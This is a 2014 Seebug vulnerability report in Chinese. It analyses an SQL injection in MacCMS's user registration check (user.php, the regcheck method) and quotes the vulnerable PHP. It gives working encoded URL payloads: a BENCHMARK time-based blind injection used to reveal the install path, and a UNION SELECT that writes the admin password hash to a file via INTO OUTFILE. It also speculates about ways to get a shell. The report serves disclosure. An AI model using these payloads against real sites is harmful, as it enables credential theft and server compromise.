苹果CMS继续无视所有过滤进行SQL注入,第二发

2014-06-24T00:00:00
ID SSV:94864
Type seebug
Reporter Root
Modified 2014-06-24T00:00:00

Description

简要描述:

这次这个地方主要是想绕过一个限制达到getshell的目的,但是本人水平有限,所以希望大家可以讨论下。

详细说明:

估计依旧小厂商,当然这倒不要紧。 继续上次的注入,如果说上次是因为单词写错的缘故,这次就不仅仅是粗心所造成的了。 接着看代码: 同样index.php开头: 上次分析过,这次直接看

``` if(empty($ac)){ $ac='vod'; $method='index'; }

$colnum = array("id","pg","yaer","typeid","classid");//依然是这里
if($parlen>=2){
    $method = $par[1];
     for($i=2;$i<$parlen;$i+=2){
        $tpl->P[$par[$i]] = in_array($par[$i],$colnum) ? intval($par[$i+1]) : urldecode($par[$i+1]);
    }
}
if($tpl->P['pg']<1){ $tpl->P['pg']=1; }
unset($colnum);
$acs = array('vod','art','map','user','gbook','comment','label');
if(in_array($ac,$acs)){
    $tpl->P["module"] = $ac;
    include MAC_ROOT.'/inc/module/'.$ac.'.php';//继续看module下的文件
}
else{
    showErr('System','未找到指定系统模块');
}

```

为了避免说是刷漏洞之类的,我们这次看/inc/module/user.php:第152行

elseif($method=='regcheck') { $status="true"; $s=$tpl->P['s'];//s是哪里来的呢 $t=$tpl->P['t'];//t就是哪里来的 switch($t)//我们看到下面$s依然没有做任何过滤,同时我们之前就可以绕过一切防护 { case "u_name": $where = " AND u_name='" .$s ."'";break; case "u_email": $where = " AND u_email='" . $s ."'";break; case "u_qq": $where = " AND u_qq='" . $s ."'";break; case "u_code": if ($_SESSION["code_userreg"] != $s){ $status="false"; } break; default : $where="";break; } if($t!="u_code" && $status=="true"){//也就是说$t为u_name,u_email,u_qq时都可以注入了 $sql = "SELECT count(*) FROM {pre}user WHERE 1=1 " . $where; $num = $db->getOne($sql); if($num>0){ $status= "false"; } } echo "{\"res\":".$status."}";; }

不知道开发看到这里有没有明白各种漏洞为什么会产生呢~ 注入比较简单,但这里我们却只能延时注入,来看下mysql_log:

<img src="https://images.seebug.org/upload/201406/241918344d3eb0e3195eefbafa931729632aa782.png" alt="maccms3.png" width="600" onerror="javascript:errimg(this);">

当然这里你无法union,只能基于时间盲注入,配合IF和BENCHMARK你依然可以读数据, 但总觉得不够满足,一直想getshell,所以不管如何先找到路径,看了下代码也没找到好的爆路径的地方,只好野蛮一点:

http://localhost/maccms8_mfb/index.php?m=user-regcheck-s-123%2527%2520and%2520BENCHMARK%252850000000%250A%252Cmd5%2528%2527test%2527%2529%2529%2523-t-u_name

<img src="https://images.seebug.org/upload/201406/2419260725cd0928ab0f311030e29dcae0d957fa.png" alt="macms.png" width="600" onerror="javascript:errimg(this);">

得到路径了,但是index.php里的一段代码让我瞬间傻了,

$m = be('get','m'); if(strpos($m,'.')){ $m = substr($m,0,strpos($m,'.')); }

也就是说其实传来的参数只会获取第一个点号出现之前的部分, 那我们怎么getshell啊,愁死了, 接下来我就开始各种YY: 1.读取密码写入无后缀文件中:【可是这样你无法下载啊】

http://localhost/maccms8_mfb/index.php?m=user-regcheck-s-123%2527%2520union%2520select%2520m_password%2520from%2520mac_manager%2520into%2520outfile%2520%2522C%253A%255C%255CAppServ%255C%255Cwww%255C%255Cmaccms8_mfb%255C%255Cinc%255C%255Ccommon%255C%255Ctest%2522%2523-t-u_name

<img src="https://images.seebug.org/upload/201406/241934340b7f8220050221b34cd7f9034414695f.png" alt="maccms2.png" width="600" onerror="javascript:errimg(this);">

2.利用NTFS ADS建立目录,类似

select 'xxx' into dumpfile 'f:\\test::$INDEX_ALLOCATION';

可是这又能干嘛 3.继续YY,可不可以以16进制方式写入路径到无后缀文件,然后再outfile到读取出来的路径中,死心吧,语法压根不可行。 4.mysql有能像oracle那样远程将数据发送到其他服务器的函数么,哎继续死心 5.还是老老实实挖一个文件包含吧 …………求大家支援

漏洞证明:

<img src="https://images.seebug.org/upload/201406/241918344d3eb0e3195eefbafa931729632aa782.png" alt="maccms3.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201406/2419260725cd0928ab0f311030e29dcae0d957fa.png" alt="macms.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201406/241934340b7f8220050221b34cd7f9034414695f.png" alt="maccms2.png" width="600" onerror="javascript:errimg(this);">